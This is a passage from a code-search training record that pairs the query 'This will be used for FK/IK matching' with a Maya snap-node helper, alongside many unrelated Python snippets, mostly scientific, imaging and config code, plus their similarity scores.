self.Stats.scalarSelector2.connect(\"currentNodeChanged(vtkMRMLNode*)\", 
self.Stats.onScalarSelector2Changed)\n self.Stats.SButton.connect('clicked(bool)', self.onApplyGetStatistics)\n\n self.NativeT1_Selector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelectNT1Node)\n self.EnhancedT1_Selector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelectET1Node)\n self.SB_NBlodd.connect(\"valueChanged(Double)\", self.onSpinBoxNBChanged)\n self.SB_EBlodd.connect(\"valueChanged(Double)\", self.onSpinBoxEBChanged)\n self.SB_Haematocrit.connect(\"valueChanged(Double)\", self.onSpinBoxHChanged)\n self.ECVButton.connect('clicked(bool)',self.onApplyECVButton)", "def config_extra_settings(self, data_dir):\n # load data directory configuration\n self.label_path = data_dir\n self.label_config_dir = os.path.join(self.label_path, 'labelconfig')\n self.label_config_suffix = 'lbl'\n\n # set icon configuration\n self._icon_dir=get_icon_dir()\n\n # set window title\n self.setWindowTitle('FreeROI')\n #self.resize(1280, 1000)\n self.center()\n # set window icon\n self.setWindowIcon(QIcon(os.path.join(self._icon_dir,'icon.png')))\n\n self._init_configuration()\n self._init_label_config_center()\n\n # create actions\n self._create_actions()\n\n # create menus\n self._create_menus()", "def load(settings):\n\n aircraft_file = settings.paths('f_aircraft')\n logger.info(f\"Reading aircraft model from file '{truncate_filepath(aircraft_file)}'...\")\n\n if not os.path.exists(aircraft_file):\n raise IOError(f\"file '{aircraft_file}' not found\")\n\n with open(aircraft_file, 'r') as fp:\n aircraft_dict = json.load(fp)\n\n # ====== Aircraft top level =====\n aircraft = Aircraft()\n aircraft.uid = aircraft_dict['uid']\n\n for key, value in aircraft_dict['refs'].items():\n aircraft.refs[key] = value\n\n # ====== Wings =====\n for wing_entry in aircraft_dict['wings']:\n wing = aircraft.add_wing(wing_entry['uid'])\n wing.symmetry = wing_entry['symmetry']\n\n # ====== Segments =====\n for segment_entry in wing_entry['segments']:\n segment = wing.add_segment(segment_entry['uid'])\n\n for key, value in segment_entry['vertices'].items():\n segment.vertices[key] = value\n\n if segment_entry.get('geometry', None):\n for key, value in segment_entry['geometry'].items():\n segment.geometry[key] = value\n\n for key, value in segment_entry['airfoils'].items():\n # From now on use the absolute file path\n if value.startswith(PATHS.DIR.AIRFOILS):\n value = os.path.join(settings.paths('root'), value)\n segment.airfoils[key] = value\n\n if segment_entry.get('panels', None):\n for key, value in segment_entry['panels'].items():\n segment.panels[key] = value\n\n # ====== Controls =====\n for control_entry in wing_entry.get('controls', []):\n control = wing.add_control(control_entry['uid'])\n control.device_type = control_entry['device_type']\n control.deflection = control_entry['deflection']\n control.deflection_mirror = control_entry.get('deflection_mirror', None)\n\n for key, value in control_entry['segment_uid'].items():\n control.segment_uid[key] = value\n\n for key, value in control_entry['rel_vertices'].items():\n control.rel_vertices[key] = value\n\n for key, value in control_entry['rel_hinge_vertices'].items():\n control.rel_hinge_vertices[key] = value\n\n control.panels['num_c'] = control_entry['panels']['num_c']\n control.check()\n\n aircraft.generate()\n return aircraft", "def __init__(self):\n self.label = \"Neural network input files\"\n self.description = \"Use this tool to create the input ASCII files for the GeoXplore neural network. 
Before using this tool, the evidence must be combined into a unique conditions raster with the Combine tool and the band statistics must be obtained for all the evidence using the Band Collection Statistics tool. If desired fuzzy membership attribute can be added to each of the training sites. See the ArcMap Tools Options discussion in Usage Tips in the Help about adjusting default setting for this tool.\"\n self.canRunInBackground = False\n self.category = \"Neural network\"", "def setup(self, initdir, settings):\n\n print(\"Moving files into initial run directory:\", initdir)\n initdir = os.path.abspath(initdir)\n for p in os.listdir(self.relaxdir):\n if (p in (io.VASP_INPUT_FILE_LIST + self.settings[\"extra_input_files\"])) and (os.path.join(self.relaxdir, p) != initdir):\n os.rename(os.path.join(self.relaxdir,p), os.path.join(initdir,p))\n print(\"\")\n sys.stdout.flush()\n\n # Keep a backup copy of the base INCAR\n shutil.copyfile(os.path.join(initdir,\"INCAR\"),os.path.join(self.relaxdir,\"INCAR.base\"))\n\n # If an initial incar is called for, copy it in and set the appropriate flag\n if (self.settings[\"initial\"] != None) and (os.path.isfile(os.path.join(self.relaxdir,self.settings[\"initial\"]))):\n new_values = io.Incar(os.path.join(self.relaxdir,self.settings[\"initial\"])).tags\n io.set_incar_tag(new_values, initdir)\n print(\" Set INCAR tags:\", new_values, \"\\n\")\n sys.stdout.flush()", "def settings(args):\n data = {}\n data['train_x'] = load_pkl(os.path.join(args.data_dir, 'train_images.pkl'))\n data['train_y'] = load_pkl(os.path.join(args.data_dir, 'train_labels.pkl'))\n data['valid_x'] = load_pkl(os.path.join(args.data_dir, 'valid_images.pkl'))\n data['valid_y'] = load_pkl(os.path.join(args.data_dir, 'valid_labels.pkl'))\n if args.combine_train_val:\n data['train_x'].update(data['valid_x'])\n data['train_y'].update(data['valid_y'])\n data['valid_x'] = load_pkl(os.path.join(args.data_dir, 'test_images.pkl'))\n data['valid_y'] = load_pkl(os.path.join(args.data_dir, './data/bsd_pkl_float/test_labels.pkl'))\n args.display_step = len(data['train_x']) / 46\n # Default configuration\n if args.default_settings:\n args.n_epochs = 250\n args.batch_size = 10\n args.learning_rate = 3e-2\n args.std_mult = 0.8\n args.delay = 8\n args.filter_gain = 2\n args.filter_size = 5\n args.n_rings = 4\n args.n_filters = 7\n args.save_step = 5\n args.height = 321\n args.width = 481\n\n args.n_channels = 3\n args.lr_div = 10.\n args.augment = True\n args.sparsity = True\n\n args.test_path = args.save_name\n args.log_path = './logs'\n args.checkpoint_path = './checkpoints'\n\n make_dirs(args, args.test_path)\n make_dirs(args, args.log_path)\n make_dirs(args, args.checkpoint_path)\n\n return args, data", "def create_net(args):\n\n # Load config file for this experiment\n xinfo = yaml.load(open(args.exp)) # experiment info\n\n # copy config to run directory\n assert osp.isdir(args.cache_dir), 'Working directory not found: ' + args.cache_dir\n # output config file\n yaml.dump(xinfo, open(args.exp_config_path, 'w'),\n default_flow_style=False)\n\n # Load dataset config file\n dcfg_path = osp.join(args.data_config_path, xinfo['INPUT']['DATASET'])\n dinfo = yaml.load(open(dcfg_path)) # dataset info\n data_dir = dinfo['ROOT']\n\n layout = xinfo['INPUT']['LAYOUT']\n inps = [s.strip() for l in layout for s in l.split(',')]\n outs = [s.strip() for s in xinfo['REFINE']['TARGETS'].split(',')]\n\n supports = ['seg', 'flow', 'norm', 'rgb', 'depth']\n\n nets = {}\n for split in ['train', 'test']:\n net_inps = 
[]\n net_outs = []\n for inp in inps:\n match = re.search('^(gt|pr)({})'.format('|'.join(supports)), inp)\n assert match is not None, 'Error in config INPUT-LAYOUT: ' + inp\n\n modality = match.group(2)\n nchannels = dinfo[modality]['n']\n path = osp.join(data_dir, dinfo[modality][match.group(1) + '-' + split])\n\n assert osp.exists(path), 'File not found: ' + path\n net_inps.append((inp, path, nchannels))\n\n for out in outs:\n # TODO: read target type: zero couplings, tight, loose couplings\n match = re.search('({})'.format('|'.join(supports)), out)\n assert match is not None, 'Error in config REFINE-TARGET: '+ out\n\n modality = match.group(1)\n nchannels = dinfo[modality]['n']\n path = osp.join(data_dir, dinfo[modality]['gt-' + split])\n\n assert osp.exists(path), 'File not found: ' + path\n net_outs.append((out, path, nchannels))\n\n loss_params = dict()\n mapping = None\n if 'mapping' in dinfo['seg']:\n idx = dinfo['seg']['mapping']\n mapping = dict(zip(idx, xrange(len(idx))))\n\n if split == 'train':\n\n # if the class weights is not in the dataset config file\n if 'gt-train-weights' not in dinfo['seg']:\n print 'Generating median frequency balancing weights.'\n (weights, mapping) = gcw.get_mfb(osp.join(dinfo['ROOT'], dinfo['seg']['gt-train']),\n dinfo['seg']['ignore_label'],\n mapping)\n # save back to dataset config\n dinfo['seg']['gt-train-weights'] = weights\n yaml.dump(dinfo, open(dcfg_path, 'w'), default_flow_style=False)\n else:\n weights = dinfo['seg']['gt-train-weights']\n # update data\n # update loss parameter\n ignore_label = dinfo['seg']['ignore_label']\n ignore_label = mapping[ignore_label] if mapping is not None else ignore_label\n loss_params['loss_param'] = {\n 'ignore_label': ignore_label,\n 'class_weighting': weights\n }\n\n # generate net prototxt\n loader = dinfo['NAME'] + '_loader'\n net_proto = arch.create_net(net_inps, net_outs, split, loader, layout, mapping, **loss_params)\n\n # output to file\n path = osp.join(args.cache_dir, getattr(args, 'exp_{}_path'.format(split)))\n open(path, 'w').write(str(net_proto))\n nets[split] = net_proto\n\n return nets", "def prepare_node(self, node):\n self.interface = IpmiInterface(\n node.get('fencer-ip'),\n node.get('fencer-user'),\n node.get('fencer-password'),\n verbose=CONF.debug)", "def setup(args):\n cfg = get_cfg()\n cfg.merge_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n # customize reszied parameters\n # cfg['INPUT']['MIN_SIZE_TRAIN'] = (20,)\n # cfg['INPUT']['MAX_SIZE_TRAIN'] = 50\n cfg.freeze()\n default_setup(\n cfg, args\n ) # if you don't like any of the default setup, write your own setup code\n return cfg", "def _setup(self, orig=False):\n log_method_call(self, self.name, orig=orig, status=self.status,\n controllable=self.controllable)\n disks = []\n for member in self.devices:\n member.setup(orig=orig)\n disks.append(member.path)\n\n mdraid.mdactivate(self.path,\n members=disks,\n array_uuid=self.mdadmFormatUUID)", "def node_setup(self):\n self.nav_tasks = {} # id -> nav_task\n self.missions = {} # id -> mission\n self.mission_state = {} # mission_id -> current task index.\n self.trigger_nav_task_active = False\n self.trigger_local_path_published = False", "def __init__(self, parent=None):\n\t\tScriptedLoadableModuleWidget.__init__(self, parent)\n\t\tVTKObservationMixin.__init__(self) # needed for parameter node observation\n\t\tself.logic = None\n\t\tself._parameterNode = None\n\t\tself._updatingGUIFromParameterNode = False\n\t\t\n\t\tself.elecModel = None\n\t\tself.elecModelLastButton = 
None\n\t\tself.elecModelButton = 0\n\t\tself.elecChanLastButton = None\n\t\tself.elecChanButton = 0\n\t\tself.lastPolButton=0\n\t\tself.active = False", "def init_extra_module(self, component_instance, function, mw_data):\n init_extra_actuator(self, component_instance, function, mw_data, ors_genpos_poster)", "def setup(self):\n super().setup()\n self.ctx.restart_calc = None\n self.ctx.inputs = AttributeDict(self.exposed_inputs(XspectraCalculation, 'xspectra'))\n\n self.ctx.inputs.parameters = self.ctx.inputs.parameters.get_dict()", "def __init__(self, animPickerUI, modulesToAdd, parent=None):\n super(ART_AddModuleToCanvas, self).__init__()\n # get the directory path of the tools\n settings = QtCore.QSettings(\"Epic Games\", \"ARTv2\")\n self.toolsPath = settings.value(\"toolsPath\")\n self.iconsPath = settings.value(\"iconPath\")\n self.scriptPath = settings.value(\"scriptPath\")\n self.projectPath = settings.value(\"projectPath\")\n\n self.pickerUI = animPickerUI\n self.modules = []\n self.modulesToAdd = modulesToAdd\n\n # assign close event\n self.closeEvent = self.closeWin\n\n # build the UI\n self.buildUI()", "def changeNodeLib(ned, createNodeWin):\n pass", "def get_init(self, storyboard):\n init = etree.SubElement(storyboard, \"Init\")\n init_act = etree.SubElement(init, \"Actions\")\n self.get_environment_actions(init_act)\n\n # Ego Vehicle\n if QgsProject.instance().mapLayersByName(\"Vehicles - Ego\"):\n vehicle_ego_layer = QgsProject.instance().mapLayersByName(\"Vehicles - Ego\")[0]\n for feature in vehicle_ego_layer.getFeatures():\n veh_id = \"Ego_\" + str(feature[\"id\"])\n orientation = feature[\"Orientation\"]\n pos_x = feature[\"Pos X\"]\n pos_y = feature[\"Pos Y\"]\n pos_z = feature[\"Pos Z\"]\n init_speed = feature[\"Init Speed\"]\n agent = feature[\"Agent\"]\n agent_camera = str(feature[\"Agent Camera\"]).lower()\n\n if agent == \"User Defined\":\n agent = feature[\"Agent User Defined\"]\n\n entity = etree.SubElement(init_act, \"Private\")\n entity.set(\"entityRef\", str(veh_id))\n self.entity_teleport_action(entity, orientation, pos_x, pos_y, pos_z)\n self.vehicle_controller(entity, str(feature[\"id\"]), agent, agent_camera, is_ego=True)\n if init_speed != 0:\n self.set_init_speed(entity, init_speed)\n\n # Vehicle\n if QgsProject.instance().mapLayersByName(\"Vehicles\"):\n vehicle_layer = QgsProject.instance().mapLayersByName(\"Vehicles\")[0]\n for feature in vehicle_layer.getFeatures():\n veh_id = \"Vehicle_\" + str(feature[\"id\"])\n orientation = feature[\"Orientation\"]\n pos_x = feature[\"Pos X\"]\n pos_y = feature[\"Pos Y\"]\n pos_z = feature[\"Pos Z\"]\n init_speed = feature[\"Init Speed\"]\n agent = feature[\"Agent\"]\n agent_camera = str(feature[\"Agent Camera\"]).lower()\n\n if agent == \"User Defined\":\n agent = feature[\"Agent User Defined\"]\n\n entity = etree.SubElement(init_act, \"Private\")\n entity.set(\"entityRef\", str(veh_id))\n self.entity_teleport_action(entity, orientation, pos_x, pos_y, pos_z)\n self.vehicle_controller(entity, str(feature[\"id\"]), agent, agent_camera, is_ego=False)\n if init_speed != 0:\n self.set_init_speed(entity, init_speed)\n\n # Pedestrian\n if QgsProject.instance().mapLayersByName(\"Pedestrians\"):\n walker_layer = QgsProject.instance().mapLayersByName(\"Pedestrians\")[0]\n for feature in walker_layer.getFeatures():\n ped_id = \"Pedestrian_\" + str(feature[\"id\"])\n orientation = feature[\"Orientation\"]\n pos_x = feature[\"Pos X\"]\n pos_y = feature[\"Pos Y\"]\n pos_z = feature[\"Pos Z\"]\n init_speed = feature[\"Init 
Speed\"]\n\n entity = etree.SubElement(init_act, \"Private\")\n entity.set(\"entityRef\", ped_id)\n self.entity_teleport_action(entity, orientation, pos_x, pos_y, pos_z)\n if init_speed != 0:\n self.set_init_speed(entity, init_speed)\n\n # Static Objects\n if QgsProject.instance().mapLayersByName(\"Static Objects\"):\n props_layer = QgsProject.instance().mapLayersByName(\"Static Objects\")[0]\n for feature in props_layer.getFeatures():\n prop_id = \"Prop_\" + str(feature[\"id\"])\n orientation = feature[\"Orientation\"]\n pos_x = feature[\"Pos X\"]\n pos_y = feature[\"Pos Y\"]\n pos_z = feature[\"Pos Z\"]\n\n entity = etree.SubElement(init_act, \"Private\")\n entity.set(\"entityRef\", prop_id)\n self.entity_teleport_action(entity, orientation, pos_x, pos_y, pos_z)", "def test_sceneImport24281(self):\r\n\r\n self.delayDisplay(\"Starting the test\")\r\n #\r\n # first, get some data\r\n #\r\n self.delayDisplay(\"Getting Data\")\r\n import SampleData\r\n head = SampleData.downloadSample(\"MRHead\")\r\n\r\n #\r\n # create a label map and set it for editing\r\n #\r\n self.delayDisplay(\"Setting up LabelMap\")\r\n volumesLogic = slicer.modules.volumes.logic()\r\n headLabel = volumesLogic.CreateAndAddLabelVolume( slicer.mrmlScene, head, head.GetName() + '-label' )\r\n selectionNode = slicer.app.applicationLogic().GetSelectionNode()\r\n selectionNode.SetActiveVolumeID( head.GetID() )\r\n selectionNode.SetActiveLabelVolumeID( headLabel.GetID() )\r\n slicer.app.applicationLogic().PropagateVolumeSelection(0)\r\n\r\n #\r\n # got to the editor and do some drawing\r\n #\r\n self.delayDisplay(\"Setting up Editor and drawing\")\r\n parameterNode = EditUtil.getParameterNode()\r\n lm = slicer.app.layoutManager()\r\n paintEffectOptions = EditorLib.PaintEffectOptions()\r\n paintEffectOptions.setMRMLDefaults()\r\n paintEffectOptions.__del__()\r\n\r\n self.delayDisplay('Paint radius is %s' % parameterNode.GetParameter('PaintEffect,radius'))\r\n sliceWidget = lm.sliceWidget('Red')\r\n size = min(sliceWidget.width,sliceWidget.height)\r\n step = int(size / 12)\r\n center = int(size / 2)\r\n parameterNode.SetParameter('PaintEffect,radius', '20')\r\n paintTool = EditorLib.PaintEffectTool(sliceWidget)\r\n self.delayDisplay('Paint radius is %s, tool radius is %d' % (parameterNode.GetParameter('PaintEffect,radius'),paintTool.radius))\r\n for label in range(1,5):\r\n EditUtil.setLabel(label)\r\n pos = center - 2*step + (step * label)\r\n self.delayDisplay('Painting %d, at (%d,%d)' % (label,pos,pos),200)\r\n paintTool.paintAddPoint(pos,pos)\r\n paintTool.paintApply()\r\n paintTool.cleanup()\r\n paintTool = None\r\n\r\n #\r\n # now build:\r\n # create a model using the command line module\r\n # based on the current editor parameters\r\n # - make a new hierarchy node\r\n #\r\n\r\n self.delayDisplay( \"Building...\" )\r\n\r\n parameters = {}\r\n parameters[\"InputVolume\"] = headLabel.GetID()\r\n # create models for all labels\r\n parameters[\"JointSmoothing\"] = True\r\n parameters[\"StartLabel\"] = -1\r\n parameters[\"EndLabel\"] = -1\r\n outHierarchy = slicer.vtkMRMLModelHierarchyNode()\r\n outHierarchy.SetScene( slicer.mrmlScene )\r\n outHierarchy.SetName( \"sceneImport2428Hierachy\" )\r\n slicer.mrmlScene.AddNode( outHierarchy )\r\n parameters[\"ModelSceneFile\"] = outHierarchy\r\n\r\n modelMaker = slicer.modules.modelmaker\r\n self.CLINode = None\r\n self.CLINode = slicer.cli.runSync(modelMaker, self.CLINode, parameters, delete_temporary_files=False)\r\n\r\n self.delayDisplay(\"Models built\")\r\n\r\n success = 
self.verifyModels()\r\n\r\n success = success and (slicer.mrmlScene.GetNumberOfNodesByClass( \"vtkMRMLModelNode\" ) > 3)\r\n\r\n self.delayDisplay(\"Test finished\")\r\n\r\n if success:\r\n self.delayDisplay(\"Ahh... test passed.\")\r\n else:\r\n self.delayDisplay(\"!$!$!#!@#!@!@$%! Test Failed!!\")\r\n\r\n self.assertTrue(success)", "def onResetParameters(self):\r\n # productive #button\r\n profprint()\r\n fileName = pathToScene = slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\", \"Config/default.cfg\")\r\n self.logic.loadParameters(fileName)", "def config_and_train(self, sys_args):\n \n self.run_config_function(sys_args)\n self.set_model_name('vgg_16')\n self.set_trainable_and_exclude_scopes(constants.checkpoint_exclude_scopes,\n constants.trainable_scopes)\n self.set_optimizer('sgd')\n self.set_max_number_of_steps(6000)\n self.train_or_eval_net(sys_args)", "def configure_basics_in_routers(self):\n \n basics_script = Basics.get_script_file()\n \n # Alteracao do nome e senha do router no script\n basics_script = Basics.replace_vars(itter_list=basics_script, pattern='{%hostname%}', replace=self.router.nome)\n basics_script = Basics.replace_vars(itter_list=basics_script, pattern='{%password%}', replace=Basics.get_default_password())\n\n _path = f'router-config/cisco/{self.router.nome}.ios'\n\n router_configfile = open(_path, 'w')\n\n # Gravacao dos dados nos arquivos de cada router em cisco/\n try:\n for line in basics_script:\n router_configfile.write(line)\n \n return f'BASICS: Arquivo de configuracao de {self.router.nome} criado com sucesso em {_path}.'\n \n except: f'BASICS: Erro na configuracao do arquivo de {self.router.nome} em {_path}!'\n\n router_configfile.close()", "def setup(self, trainer: \"pl.Trainer\") -> None:\n trainer_fn = trainer.state.fn\n if trainer_fn == TrainerFn.FITTING:\n super().setup(trainer)\n else:\n assert self.accelerator is not None\n self.accelerator.setup(trainer)\n\n # move the model to the correct device\n self.model_to_device()\n self.setup_precision_plugin()\n assert self.model is not None", "def __init__(self, experiment, label=None):\n\n super(DrawTransitions, self).__init__(experiment, name=\"DrawTransitions\", label=label)\n\n self.epoch_start = self.experiment.config.getint(self.config_section, 'epoch_start', 0)\n self.epoch_end = self.experiment.config.getint(self.config_section, 'epoch_end',\n default=self.experiment.config.getint('Experiment', 'epochs', default=-1))\n self.frequency = self.experiment.config.getint(self.config_section, 'frequency', 1)\n self.priority = self.experiment.config.getint(self.config_section, 'priority', 0)\n self.filename = self.experiment.config.get(self.config_section, 'filename', default='transitions')\n self.format = self.experiment.config.get(self.config_section, 'format', default='png')\n self.transparent = self.experiment.config.getboolean(self.config_section, 'transparent', default=False)\n self.display_epoch = self.experiment.config.getboolean(self.config_section, 'display_epoch', default=False)\n\n self.colors = self.experiment.population._cell_class.type_colors\n self.types = self.experiment.population._cell_class.types\n self.max_types = self.experiment.population._cell_class.max_types\n\n self.node_labels = {}", "def _create_default_setting(path):\n try:\n from configparser import ConfigParser\n except ImportError:\n from ConfigParser import ConfigParser # ver. 
< 3.0\n\n # instantiate\n config = ConfigParser()\n\n # update existing value\n config['Assets Paths'] = {\n 'background': 'assets\\\\images\\\\background.png',\n 'bullet': 'assets\\\\images\\\\bullet.png',\n 'bullet_red': 'assets\\\\images\\\\bullet_red.png',\n 'icon' : 'assets\\\\images\\\\RedInvader.png',\n\n 'ship': 'assets\\\\images\\\\Ship.png',\n 'ship_cr': 'assets\\\\images\\\\ShipCrushedRight.png',\n 'ship_cl': 'assets\\\\images\\\\ShipCrushedLeft.png',\n 'ship_cc': 'assets\\\\images\\\\ShipWhite.png',\n\n 'invadera1': 'assets\\\\images\\\\InvaderA1.png',\n 'invadera2': 'assets\\\\images\\\\InvaderA2.png',\n 'invaderb1': 'assets\\\\images\\\\InvaderB1.png',\n 'invaderb2': 'assets\\\\images\\\\InvaderB2.png',\n 'invaderc1': 'assets\\\\images\\\\InvaderC1.png',\n 'invaderc2': 'assets\\\\images\\\\InvaderC2.png',\n\n }\n config['castle'] = {\n 'castle_location': [\n [1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1],\n [1, 1, 0, 1, 1],\n [1, 0, 0, 0, 1],\n ],\n 'start_x': 50,\n 'start_y': 500,\n 'column': 5,\n 'row': 5,\n 'block_l3': (9, 255, 14),\n 'block_l2': (27, 255, 30),\n 'block_l1': (114, 255, 133),\n }\n config['alien'] = {\n 'margin_width': 200,\n 'margin_height': 20,\n 'column': 'd',\n 'Row': 5,\n 'width_x': 10,\n 'width_y': 10,\n 'movement': 10,\n 'alien_column_config': r'{\"0\":{\"path1\":\"InvaderA1\",\"path2\":\"InvaderA2\"},\"1\":{\"path1\":\"InvaderB1\",\"path2\":\"InvaderB2\"},\"2\":{\"path1\":\"InvaderB1\",\"path2\":\"InvaderB2\"},\"3\":{\"path1\":\"InvaderC1\",\"path2\":\"InvaderC2\"},\"4\":{\"path1\":\"InvaderC1\",\"path2\":\"InvaderC2\"}}'\n }\n config['player 1'] = {\n 'margin': 20,\n 'speed': 3\n }\n\n with open(path, 'w') as configfile:\n config.write(configfile)", "def enter(self):\r\n self.turnOffLightboxes()\r\n self.installShortcutKeys()\r\n\r\n # Set parameter set node if absent\r\n self.selectParameterNode()\r\n self.editor.updateWidgetFromMRML()\r\n \r\n # If no segmentation node exists then create one so that the user does not have to create one manually\r\n if not self.editor.segmentationNodeID():\r\n newSegmentationNode = slicer.mrmlScene.CreateNodeByClass('vtkMRMLSegmentationNode')\r\n slicer.mrmlScene.AddNode(newSegmentationNode)\r\n self.editor.setSegmentationNode(newSegmentationNode)\r\n masterVolumeNodeID = self.getDefaultMasterVolumeNodeID()\r\n self.editor.setMasterVolumeNodeID(masterVolumeNodeID)", "def __init__(self, pklfile=None, preffile=_preffile):\n\n super(config_controller, self).__init__()\n self.pklfile = pklfile\n self.preffile = preffile" ]
[ "0.5719306", "0.5415949", "0.5388942", "0.5385029", "0.5336632", "0.5299819", "0.5200528", "0.5145229", "0.5140653", "0.51194525", "0.5079638", "0.50723904", "0.50585204", "0.50376135", "0.5010488", "0.49763772", "0.49707508", "0.49594924", "0.4954051", "0.4949411", "0.4947352", "0.4943901", "0.4934593", "0.49284354", "0.4923892", "0.4923892", "0.4923892", "0.4923892", "0.49217173", "0.4919505", "0.49172956", "0.49127904", "0.48924997", "0.48924997", "0.48924997", "0.48894072", "0.488293", "0.48692843", "0.4862807", "0.48608032", "0.48587546", "0.48572928", "0.4835457", "0.48325357", "0.48309034", "0.4825999", "0.4813325", "0.4805297", "0.4794852", "0.47910696", "0.47814056", "0.47706217", "0.47663957", "0.4762909", "0.4758006", "0.4757204", "0.47485957", "0.47461104", "0.47403783", "0.47369528", "0.47366032", "0.47349852", "0.47309327", "0.47273844", "0.47201413", "0.47201335", "0.4719329", "0.47168612", "0.47165364", "0.4716268", "0.4712119", "0.47087467", "0.47043702", "0.4704265", "0.46983424", "0.4697081", "0.46935275", "0.4692958", "0.46838683", "0.4681121", "0.4679565", "0.4674944", "0.4671631", "0.4668328", "0.46670285", "0.4664907", "0.46619886", "0.46619788", "0.4661319", "0.46597382", "0.46553832", "0.4652706", "0.46501863", "0.46484464", "0.46462658", "0.4645533", "0.46400067", "0.4628762", "0.46283883", "0.46265304" ]
0.5789509
0
This will be used for FK/IK matching
def create_snapto_node(ctrl, jnt):
    # Build a clean SNAPTO transform under jnt that matches ctrl (used for FK/IK matching).
    snapto = ctrl+'_SNAPTO'
    # If a SNAPTO node already exists, reuse its parent joint and rebuild it
    if mc.objExists(snapto):
        jnt = utils.get_parent(snapto)
        mc.delete(snapto)
    # Duplicate the control (parent-only) to get an offset group and the snap target
    snapto_grp = mc.duplicate(ctrl, po=1, n=ctrl+'_SNAPTO_GRP')[0]
    snapto = mc.duplicate(ctrl, po=1, n=ctrl+'_SNAPTO')[0]
    utils.set_attrs([snapto_grp, snapto], k=1, l=0)
    mc.parent(snapto_grp, jnt)
    mc.parent(snapto, snapto_grp)
    # Strip user-defined attributes copied over by the duplicate;
    # listAttr returns None when there are none, so guard with an empty list
    ua = mc.listAttr(snapto, ud=1) or []
    for a in ua:
        try:
            mc.setAttr(snapto+'.'+a, l=0)
            mc.deleteAttr(snapto+'.'+a)
            mc.setAttr(snapto_grp+'.'+a, l=0)
            mc.deleteAttr(snapto_grp+'.'+a)
        except:
            pass
    return snapto
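A minimal usage sketch for the helper above, assuming a Maya session where maya.cmds is importable and create_snapto_node (with its utils module) is on the path; the wrapper name snap_ctrl_to_joint and the node names in the example call are hypothetical stand-ins, not part of the original record.

# Hypothetical sketch: snap a control onto its joint via the SNAPTO node.
# Assumes a running Maya session; all node names below are made up.
import maya.cmds as mc

def snap_ctrl_to_joint(ctrl, jnt):
    # Build (or rebuild) the SNAPTO target parented under the joint
    snapto = create_snapto_node(ctrl, jnt)
    # Read the SNAPTO node's world matrix and apply it to the control
    mat = mc.xform(snapto, q=True, ws=True, matrix=True)
    mc.xform(ctrl, ws=True, matrix=mat)

# e.g. snap_ctrl_to_joint('arm_fk_CTRL', 'arm_ik_JNT')

Because the SNAPTO node lives under the joint, querying its world matrix gives the pose the control must take for the FK chain to line up with the IK result, which is the core of an FK/IK match.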
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ikFkMatch(\n namespace,\n ikfk_attr,\n ui_host,\n fks,\n ik,\n upv,\n ik_rot=None,\n key=None):\n\n # returns a pymel node on the given name\n def _get_node(name):\n # type: (Text) -> pm.nodetypes.Transform\n name = anim_utils.stripNamespace(name)\n if namespace:\n node = anim_utils.getNode(\":\".join([namespace, name]))\n else:\n node = anim_utils.getNode(name)\n\n if not node:\n mgear.log(\"Can't find object : {0}\".format(name), mgear.sev_error)\n\n return node\n\n # returns matching node\n def _get_mth(name):\n # type: (str) -> pm.nodetypes.Transform\n tmp = name.split(\"_\")\n tmp[-1] = \"mth\"\n query = \"_\".join(tmp)\n n = _get_node(query)\n\n if not n:\n mgear.log(\"Can't find mth object : {0} for {1}\".format(query, name), mgear.sev_comment)\n return _get_node(name)\n else:\n return n\n\n # get things ready\n fk_ctrls = [_get_node(x) for x in fks]\n fk_goals = [_get_mth(x) for x in fks]\n ik_ctrl = _get_node(ik)\n ik_goal = _get_mth(ik)\n upv_ctrl = _get_node(upv)\n\n if ik_rot:\n ik_rot_node = _get_node(ik_rot)\n ik_rot_goal = _get_mth(ik_rot)\n\n ui_node = _get_node(ui_host)\n o_attr = ui_node.attr(ikfk_attr)\n\n switch_to_fk = (o_attr.get() == 1.0)\n switch_to_ik = (not switch_to_fk)\n\n # sets keyframes before snapping\n if key:\n _all_controls = []\n _all_controls.extend(fk_ctrls)\n _all_controls.extend([ik_ctrl, upv_ctrl, ui_node])\n if ik_rot:\n _all_controls.extend([ik_rot_node])\n [cmds.setKeyframe(\"{}\".format(elem),\n time=(cmds.currentTime(query=True) - 1.0))\n for elem in _all_controls]\n\n # if is IKw then snap FK\n if switch_to_fk:\n\n world_matrices = []\n for src, _ in zip(fk_goals, fk_ctrls):\n world_matrices.append(getMatrix(src))\n\n o_attr.set(0.0)\n\n for mat, dst in zip(world_matrices, fk_ctrls):\n setMatrix(dst, mat)\n\n for mat, dst in zip(world_matrices, fk_ctrls):\n setMatrix(dst, mat)\n\n # if is FKw then sanp IK\n elif switch_to_ik:\n\n shoulder_mat = getMatrix(fk_goals[0])\n ik_mat = getMatrix(ik_goal)\n\n # transform.matchWorldTransform(ik_goal, ik_ctrl)\n if ik_rot:\n rot_mat = getMatrix(ik_rot_goal)\n # transform.matchWorldTransform(ik_rot_goal, ik_rot_node)\n\n upv_mat = getMatrix(fk_goals[2])\n\n o_attr.set(1.0)\n\n setMatrix(ik_ctrl, ik_mat)\n setMatrix(upv_ctrl, upv_mat)\n # for _ in range(10):\n # fk_ctrls[0].setMatrix(shoulder_mat, worldSpace=True)\n\n for _ in range(20):\n cmds.xform(fk_ctrls[0].name(), ws=True, matrix=shoulder_mat)\n if ik_rot:\n setMatrix(ik_rot_node, rot_mat)\n\n # transform.matchWorldTransform(fk_goals[1], upv_ctrl)\n # calculates new pole vector position\n start_end = (fk_goals[-1].getTranslation(space=\"world\") - fk_goals[1].getTranslation(space=\"world\"))\n start_mid = (fk_goals[2].getTranslation(space=\"world\") - fk_goals[1].getTranslation(space=\"world\"))\n\n dot_p = start_mid * start_end\n proj = float(dot_p) / float(start_end.length())\n proj_vector = start_end.normal() * proj\n arrow_vector = (start_mid - proj_vector) * 1.5\n arrow_vector *= start_end.normal().length()\n final_vector = (arrow_vector + fk_goals[2].getTranslation(space=\"world\"))\n upv_ctrl.setTranslation(final_vector, space=\"world\")\n\n # sets blend attribute new value\n # o_attr.set(1.0)\n roll_att = ui_node.attr(ikfk_attr.replace(\"blend\", \"roll\"))\n roll_att.set(0.0)\n\n setMatrix(ik_ctrl, ik_mat)\n if ik_rot:\n setMatrix(ik_rot_node, rot_mat)\n # 